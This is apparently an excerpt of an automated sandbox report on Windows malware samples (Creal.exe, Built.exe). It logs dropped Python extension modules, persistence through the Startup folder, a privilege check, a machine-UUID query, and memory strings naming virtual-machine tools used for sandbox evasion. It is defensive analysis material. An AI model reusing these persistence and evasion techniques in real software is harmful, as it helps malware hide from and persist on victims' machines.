              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_ghash_clmul.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_overlapped.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_BLAKE2b.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_arc2.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ocb.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_pkcs1_decode.pyd
              Source: C:\Users\user\Desktop\Built.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\rar.exe
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Math\_modexp.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ofb.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_ed25519.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_curve448.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_decimal.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ecb.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA1.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\cryptography\hazmat\bindings\_rust.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_BLAKE2s.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ctr.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_cfb.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_aes.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_aesni.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_multiprocessing.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_multiprocessing.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Protocol\_scrypt.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_des.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_curve25519.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_asyncio.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_ctypes.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA384.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_curve25519.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_MD5.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_ssl.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_cast.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA256.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\select.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_ed448.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_ec_ws.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_arc2.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_Salsa20.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_queue.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_MD2.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_asyncio.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_hashlib.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_uuid.pyd
              Source: C:\Users\user\Desktop\Built.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\_ctypes.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_wmi.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA384.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_ctypes.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_ghash_portable.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA1.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Util\_cpuid_c.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_ecb.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\unicodedata.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA224.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_ghash_portable.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_cffi_backend.cp313-win_amd64.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_RIPEMD160.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_MD4.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_ssl.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_ctr.pyd
              Source: C:\Users\user\Desktop\Built.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\_decimal.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA256.pyd
              Source: C:\Users\user\Desktop\Built.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\python312.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_cbc.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_MD5.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_sqlite3.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_ec_ws.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_ed448.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA224.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_BLAKE2s.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA512.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_bz2.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_des.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_RIPEMD160.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_MD2.pyd
              Source: C:\Users\user\Desktop\Built.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_3-18234
              Source: C:\Users\user\Desktop\Creal.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_2-17221
              Source: C:\Users\user\Desktop\Built.exe API coverage: 3.3 %
              Source: C:\Users\user\Desktop\Creal.exe API coverage: 1.8 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5160 Thread sleep count: 7877 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6496 Thread sleep count: 1614 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 968 Thread sleep time: -6456360425798339s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6492 Thread sleep count: 7802 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 380 Thread sleep time: -10145709240540247s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 796 Thread sleep count: 1683 > 30
              Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe Code function: 0_2_00007FF60638647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF60638647C
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe Code function: 0_2_00007FF60639ECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF60639ECE0
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe Code function: 0_2_00007FF6063B3130 FindFirstFileExA,0_2_00007FF6063B3130
              Source: C:\Users\user\Desktop\Creal.exe Code function: 2_2_00007FF6D9249280 FindFirstFileExW,FindClose,2_2_00007FF6D9249280
              Source: C:\Users\user\Desktop\Creal.exe Code function: 2_2_00007FF6D92483C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF6D92483C0
              Source: C:\Users\user\Desktop\Creal.exe Code function: 2_2_00007FF6D9261874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF6D9261874
              Source: C:\Users\user\Desktop\Built.exe Code function: 3_2_00007FF65E2883C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00007FF65E2883C0
              Source: C:\Users\user\Desktop\Built.exe Code function: 3_2_00007FF65E289280 FindFirstFileExW,FindClose,3_2_00007FF65E289280
              Source: C:\Users\user\Desktop\Built.exe Code function: 3_2_00007FF65E2A1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00007FF65E2A1874
              Source: C:\Users\user\Desktop\Built.exe Code function: 4_2_00007FF65E289280 FindFirstFileExW,FindClose,4_2_00007FF65E289280
              Source: C:\Users\user\Desktop\Built.exe Code function: 4_2_00007FF65E2A1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF65E2A1874
              Source: C:\Users\user\Desktop\Built.exe Code function: 4_2_00007FF65E2883C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF65E2883C0
              Source: C:\Users\user\Desktop\Creal.exe Code function: 5_2_00007FF6D9249280 FindFirstFileExW,FindClose,5_2_00007FF6D9249280
              Source: C:\Users\user\Desktop\Creal.exe Code function: 5_2_00007FF6D92483C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF6D92483C0
              Source: C:\Users\user\Desktop\Creal.exe Code function: 5_2_00007FF6D9261874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF6D9261874
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe Code function: 0_2_00007FF6063A5134 VirtualQuery,GetSystemInfo,0_2_00007FF6063A5134
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
              Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
              Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\
              Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\
              Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
              Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dqemu-ga
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: fvmwaretray
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxservice
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: fvmwareservice
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmwaretray
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vYfvmtoolsd
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvboxtray
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmtoolsd
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareuser
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \Ufecodevmsrvc
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmsrvc
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: fecodevmware
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: f8vmusrvc
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: pfvboxservice
              Source: Built.exe, 00000004.00000002.2162306766.000002D966844000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWment%SystemRoot%\system32\mswsock.dll
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: d2qemu-ga
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwaretray
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: fvboxtray
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxtray
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: qemu-ga
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmsrvc
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmware
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareservicer`
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmwareuser
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmusrvc
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmware)
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmtoolsd
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwaretrayg
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvboxservice
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: fvmwareuser
              Source: Creal.exe, 00000005.00000003.2162828040.00000203E73E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ro.kernel.qemur
              Source: Creal.exe, 00000005.00000003.2402826222.00000203E7552000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2418046501.00000203E7552000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2369898360.00000203E7538000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2380069030.00000203E7545000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2382040369.00000203E7551000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374232940.00000203E7545000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2371014632.00000203E7543000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW?
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmusrvc
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareservice
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmwareservice
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe Code function: 0_2_00007FF6063AAC68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6063AAC68
              Source: C:\Users\user\Desktop\Built.exe Code function: 4_2_00007FFD93657A20 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,4_2_00007FFD93657A20
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe Code function: 0_2_00007FF6063B41B0 GetProcessHeap,0_2_00007FF6063B41B0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe Code function: 0_2_00007FF6063AAC68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6063AAC68
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe Code function: 0_2_00007FF6063A5CE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6063A5CE0
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe Code function: 0_2_00007FF6063A6940 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6063A6940
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe Code function: 0_2_00007FF6063A6B24 SetUnhandledExceptionFilter,0_2_00007FF6063A6B24
              Source: C:\Users\user\Desktop\Creal.exe Code function: 2_2_00007FF6D924D30C SetUnhandledExceptionFilter,2_2_00007FF6D924D30C
